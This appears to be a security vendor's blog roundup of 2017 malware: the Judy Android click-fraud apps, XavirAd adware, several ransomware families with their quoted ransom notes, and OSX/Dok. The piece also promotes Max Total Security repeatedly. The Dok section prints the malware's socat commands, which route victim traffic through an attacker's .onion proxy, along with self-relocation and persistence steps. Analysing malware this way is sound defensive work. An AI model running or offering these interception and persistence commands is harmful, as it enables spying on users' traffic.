The Judy Malware-Android

Up to 36.5 million Android devices may have been infected by malware that produced fake ad clicks and lined the pockets of its developers. 41 apps developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp., “infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.

Google “swiftly” removed the apps from Google Play after being alerted to their existence, but not before they “reached an astonishing spread between 4.5 million and 18.5 million downloads.
judy-malware

Once a user downloads a malicious app, it silently registers receivers which establish a connection with the [Command and Control] server. The server replies with the actual malicious payload, which includes JavaScript code, a user-agent string and URLs controlled by the malware author. The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website. Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure.

Keep your Android device protected with the updated Max Total Security for Android.

Despite apps going through periodic reviews, Google’s Play Store security system, named Bouncer, wasn’t able to pick up the malware’s malicious activity.
Google launches new Android security services

On May 17, during the Google I/O annual event, Google announced a new service called Google Play Protect. According to Google, this new service continuously scans all Android apps and user devices for malicious behavior and uses machine learning to detect any suspicious activity. Once it detects a malicious app, it removes it from the phones of all users who installed it.

The new Google Play Protect service suite is currently shipping to all devices with the Google Play app installed.

MoWare H.F.D ransomware

MoWare H.F.D is a ransomware cryptovirus that displays a window with a ransom message. The ransomware is a variant of HiddenTear and places the extension .H_F_D_locked after encryption. MoWare H.F.D ransomware might also distribute its payload file through spam emails, social media and file-sharing services. MoWare H.F.D ransomware makes entries in the Windows Registry to achieve persistence, and could launch or repress processes in a Windows environment. Such entries are typically designed in a way to launch the virus automatically with each start of the Windows operating system.

The MoWare H.F.D Ransomware is perceived as a very threatening Trojan because it is designed to encrypt 666 file types and support limiting the user’s control of the OS. A detailed report from cyber security researchers revealed that the MoWare H.F.D Ransomware could terminate access to the Registry Editor, the Task Manager, and the Command Line tool. Server administrators may have a hard time purging the MoWare H.F.D Ransomware from their network. The Trojan is associated with the ‘.H_F_D_locked’ string that is used a marker to inform users which files have been encrypted. For example, ‘Stars shack.png’ is renamed to ‘Stars shack.png.H_F_D_locked’ and the Windows Explorer does not generate a thumbnail for the photo. The encryption process may trigger error reports in database managers like MySQL, OracleDB and MongoDB. The ransom notification is generated as a program window named ‘MoWare H.F.D’ that says:

‘INFORMATION SECURITY
Your Personal Files has been Encrypted and Locked
Your documents, photos, databases and other important files have been encrypted with strongest encryption and locked with unique key, generated for this computer.
Private decryption key is stored on a secret Internet server and nobody can decrypt your files until you pay and obtain the private key.
Caution: Removing of MoWare H.F.D will not restore access ti your encrypted files.
Frequently Asked Questions
What happened to my files ? understanding the issue
How can i get my files back ? the only way to restore your files
What should i do next ? Buy decryption key
Now you have the last chance to decrypt your files.
1. Buy Bitcoin (https://blockchain.info)
2. Send amount of 0.02 BTC to address: 15nbyuacLHfm3FrC5hz1nigNVqEbDwRUJq
3. Transaction will take about 15-30 minutes to confirm.
4. When transaction is confirmed, send email to us at heyklog@protonmail.com

You should NOT under any circumstances pay the ransom. Your files may not get restored, and nobody could give you a real guarantee. Moreover, giving money to cybercriminals will likely motivate them to create more ransomware or do other criminal activities. You should keep an updated Anti Virus program such as Max Total Security which provides daily back and easy to restore mechanism in case you get infected with any of the Ransomware.

LightningCrypt ransomware

LightningCrypt is a crypto-malware that uses a strong encryption cipher to wreck various data stored on the targeted computer. This file-encrypting virus appends .LIGHTNING file extension to each of the corrupted pictures, audio, video, and text files, documents, databases and other widely used records. As soon as all targeted data is locked, ransomware delivers a ransom note in LightningCrypt_Recover_Instructions.txt file and triggers a pop-up window.

The threatening letter from cyber criminals tells that trying to recover data or delete LightningCrypt ransomware will lead to the data loss. According to the ransom note, the only way to decrypt files is to transfer 0.17 Bitcoins to the provided address. Once the transaction is made, damaged files should be recovered immediately. However, chances that you will never get back your files are quite high.

Cybercriminals created this malicious program to swindle the money from innocent computer users. Thus, they may not bother about decrypting their files because no one can find them and punish for a unkept promise. LightningCrypt infects when you open an infected email attachment. As soon as a person clicks on such file, malware payload is dropped and executed on the system. Apart from encrypting data, ransomware also modifies the registry and makes some entries in order to run itself automatically when Windows OS is launched. What is more, this cyber infection makes computer’s system vulnerable and might open the backdoor to other malware.

You should keep an updated Anti Virus program such as Max Total Security which provides daily back and easy to restore mechanism in case you get infected with any of the Ransomware.

May Ransomware

Month of May we saw a new Ransomware called May Ransomware. Once infiltrated, May encrypts various data using AES-256 and RSA-4096 encryption algorithms and appends filenames with the “.locked” extension (for example, “sample.jpg” is renamed to “sample.jpg.locked”). May then creates a text file (“Restore_your_files.txt”) containing a ransom-demand message and places it in each folder containing encrypted files.

The message informs victims of the encryption and make ransom demands of 1 Bitcoin (approximately, $1750) in exchange for file decryption. As mentioned above, May employs AES and RSA cryptographies and, therefore, decryption without unique keys is impossible. All of the files that get encrypted will receive the same extension appended to them, and that is the ‘.maysomware’ and ‘.locked’ extension.

The criminals provide each of their victims with a personal identification number. Presumably, the hackers keep all the ID’s in some sort of database next to the unique data decryption keys. That’s why the victims are asked to submit this number along with the payment. Nevertheless, this does not mean that you should. On the opposite, you should avoid getting involved in any type of collaboration with the criminals and take all measures possible to remove May virus from your computer.

You should keep an updated Anti Virus program such as Max Total Security which provides daily back and easy to restore mechanism in case you get infected with any of the Ransomware.

Google Play Apps Found Serving Adware

Dozens of applications available on Google Play were found delivering a strain of adware capable of collecting users’ personal information.
With these apps installed, users will have a full screen advertisement popping up at regular intervals even when the app is closed. For example:
adware-popup
The program then downloads another .dex file from cloud.api-restlet.com, which collects the following information from the user’s device:

Email address for Google account
List of apps installed
IMEI identifier and android_id
Screen resolution
Manufacturer, model, brand, OS version
SIM operator
App installation source

To avoid detection, researchers also found XavirAd to use encrypted strings. Each class has its own decryption routine in the class constructor, and although the algorithm remains the same, the keys are different in each class.

Furthermore, the XavirAd library uses anti-sandbox technology to hide from dynamic analysis, stopping malicious behaviors once it detects it is running in a testing environment. It also checks the user’s email address for another safety net that it’s not run by a tester. If the email address contains the following strings, it will stop the action:
The following Google Play apps contain XavirAd, and users may want to avoid them:
apps-used-on-google-play

WanaCry Ransomware

WanaCrypt, or also known as WanaCry, is a new ransomware that wreaked havoc across the world last night, which spreads like a worm by leveraging a Windows SMB vulnerability (MS17-010) that has been previously fixed by Microsoft in March. In these attacks, data is encrypted with the extension “.WCRY” added to the filenames. “WannaCry”, is initiated through an SMBv2 remote code execution in Microsoft Windows. This exploit (codenamed “EternalBlue”) has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14.

Unfortunately, it appears that many organizations have not yet installed the patch.

In the wake of the largest ransomware attack in the history that had already infected over 114,000 Windows systems worldwide since last 24 hours, Microsoft just took an unusual step to protect its customers with out-of-date computers. Microsoft has just released an emergency security patch update for all its unsupported version of Windows, including Windows XP, Vista, Windows 8, Server 2003 and 2008 Editions. Download vulnerability patch from here https://technet.microsoft.com/en-us/library/security/ms17-010.aspx .

People already infected with this ransomware will not get their files back. It means that no new infections will occur with yesterday’s strain. Currently, there’s no known method of breaking the ransomware’s encryption. The only viable method of getting files back at the moment is from previous operating system backups, and by paying the ransom note, as a last resort. We recommend using Max Total Security which can help you restore your file from daily back up module, Tools>Max Backup Utility. It can also detect and terminate this Ransomware from spreading further on your PC.

Max Total Security also has a newly introduced module in its tools treasure. Tools>Max Application Whitelist , this module allows you to completely protect your PC from any unauthorized, not welcome executables. In a normal day to day operation you know which programs you are going to use on your PC so just go to this tool and allow those applications whicih run from program file folder. System executables are already taken care off. From now onward , no other executable will be allowed to run on your PC, completely protecting it from any types of Trojans.

Amnesia ransomware

The Amnesia Ransomware is used to take the victims’ files hostage. Ransomware Trojans like the Amnesia Ransomware are designed to encrypt the victim’s files using a strong encryption algorithm. It encrypts victim’s files and refrains from accessing their sensitive and other personal files. It alters the names of all encrypted files with .amnesia extension. Then attacker demands a ransom in exchange for file decryption.
The files encrypted in the Amnesia Ransomware attack will no longer be readable and may show up as blank icons in the Windows Explorer. The Amnesia Ransomware targets a wide variety of files, generally looking for user generated files that may include spreadsheets, text documents, images, videos, music files, databases, etc. The Amnesia Ransomware delivers its ransom note in the form of a text file named ‘HOW TO RECOVER ENCRYPTED FILES.TXT.’ This file alerts the victim of the attack and demands the payment of a ransom to recover the infected files. The full text of the Amnesia Ransomware ransom note:

‘YOUR FILES ARE ENCRYPTED!
Your personal ID:
[RANDOM CHRACTERS]
Attention! What happened?
Your documents, databases and other important data has been encrypted.
If you want to restore files send an email to: s1an1er111@protonmail.com
In a letter to indicate your personal identifier (see in the beginning of this document).
Attention!
* Do not attempt to remove the program or run the anti-virus tools.
* Attempts to self-decrypting files will result in the loss of your data.
* Decoders are not compatible with other users of your data, because each user’s unique encryption key.’

The best protection against the Amnesia Ransomware and similar ransomware threats is to have backups of all files on an independent memory device or the cloud, as well as a reliable security program like Max Total Security that is fully up-to-date and capable of intercepting the Amnesia Ransomware and similar threat attacks before they can start infection.

Mikoyan ransomware

The infection process of .MIKOYAN ransomware is very similar to other ransomware infections out there. The malware may take advantage of massive spam campaigns that redistribute malicious attachments as well web links that lead to the download of the infection files. Such e-mails are cleverly orchestrated in a manner that aims to convince users to open the attachment.

mikoyan-ransomware
Besides via e-mail, the .MIKOYAN ransomware virus may also be replicated via multiple other methods such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via a fake key generators or license activators uploaded on torrent websites.

Once this ransomware infection has already become active on a computer, the .MIKOYAN virus drops it’s malicious payload files. They are often located in the following Windows directories:

%Common%
%AppData%
%LocalLow%
%Local%
%Roaming%
Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files that exist under different names, often randomly generated ones. After the encryption process has completed, the ransomware sets a .MIKOYAN file extension to the files encrypted by it.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry editor, more specifically the Run and RunOnce registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Like always we recommend that you keep an updated copy of Max Total Security on your PC which can restore your files from the daily built in back up. Also, 24×7 free support can help you with any issues. You can get it from here Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although there is nothing limiting these attacks only to Brazil since these threat attacks can target computers anywhere). Taking advantage of remote desktop connections protected poorly is carrying out the XPan Ransomware attacks. Exploiting poor password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and .one ransomware was found during an in-depth analysis of the malicious program. The similarities include the target file extensions, ransom note, commands executed before and after the encryption process and even the public RSA keys of the criminals.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. According to one of the victims, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
Dok
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app …gives all users execute permission
rm -fr “/Users/_%USER%_/Downloads/Dokument.app”…delete the original copy
“/Users/Shared/Appstore.app/Contents/MacOS/AppStore”Dokument…exceute the application

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents will redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

Beware of emails attachments, do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.